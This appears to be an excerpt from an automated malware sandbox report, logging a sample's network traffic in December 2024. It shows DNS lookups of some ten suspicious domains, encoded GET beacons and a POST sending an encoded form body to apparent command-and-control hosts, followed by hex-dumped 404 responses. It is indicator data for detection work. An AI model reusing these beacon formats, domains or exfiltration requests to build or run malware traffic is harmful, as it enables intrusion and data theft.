                Source: global trafficHTTP traffic detected: GET /sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?b6=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?b6=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.amayavp.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vayui.topConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.rgenerousrs.storeConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /jhb8/?b6=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.t91rl7.proConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /alu5/?b6=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.learnwithus.siteConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.cuthethoi.online
                Source: unknownHTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 207Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50 Data Ascii: b6=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:27:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Dec 2024 22:28:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-03T22:28:39.8232335Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:28:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBt3%2B%2BPrqpUtsr0PSrY9vfS6p%2BSY%2Fho%2B2kDWEGJpkz4clJgh5OhMnxSR1MjALPZ6BdJ4MypXPShu8BCz9w9oo6VFguH%2FOnL617KmFzy7Le4qJ81eYhkZSe7JTDbWqYTl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe1d9c5d18ea-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1456&rtt_var=728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:28:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zan3ks7g%2FmWr2oE6XaRVZtrrrZU39zQM%2BLpmULiZlBL4rcDB1w6mspGhyHqnySJFLUdXWeMpHpfaVo9zN1O0beDeywvGGsi%2BWQ3iWRm0nNvJ2ZiDP5YJzVxE%2BeqBwPp9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe2e4b9f43e3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuGmHRhyp2yInOtvh4Fa470vyDVmqr%2Bl9RWhf7URkL23c4RihzoCzts6zcqeO264QGXdjLKqRWHHQuzZhvqj51n71VSC4Jr9yBbx%2BFADvHm64439trgEe%2BL397uOcc9K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe3edecc15d7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1581&rtt_var=790&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRdhCF7lc3yjw0%2F%2FfAxy5m4RakYA0D6ABxTwWEzEOoDEuVyOYXy6rRvqpPZ5QuDKPojZv0lfE1E8HbF%2B8fvj3e8nxYV3WqcPcrpSFy8SxPu7R4j1yIe9qTbP%2Blep%2B2dg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe4fc99e430f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGwW8YZYGqXOQ2GQX69tYzoGLflPrPMbc01lRT8n4bvnZ%2BlgUCNR4pu3LZKIcAG3Mgn2Qj0SV82KEBsuufhLLdwoX2l5BDfZ1IjNnVcNzcUlcr5ZtMbQVFpkANSuiYOYWU6JXl8AFnw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe7ad90a8c36-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1825&rtt_var=912&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7vyIQgYeCQleSOWRI0XZtNLF8kqFlrdffjaihyJMmpO8P2MmknId7gI4wLHoWLJZiNM3vYl2t%2B92Ux%2Blx9n2eHIBH3d%2BdwaJS313hYLB2OpzLqT9ktwoWGOkNs3bZkOV5OLje3lHEhY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe8b3d358c15-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 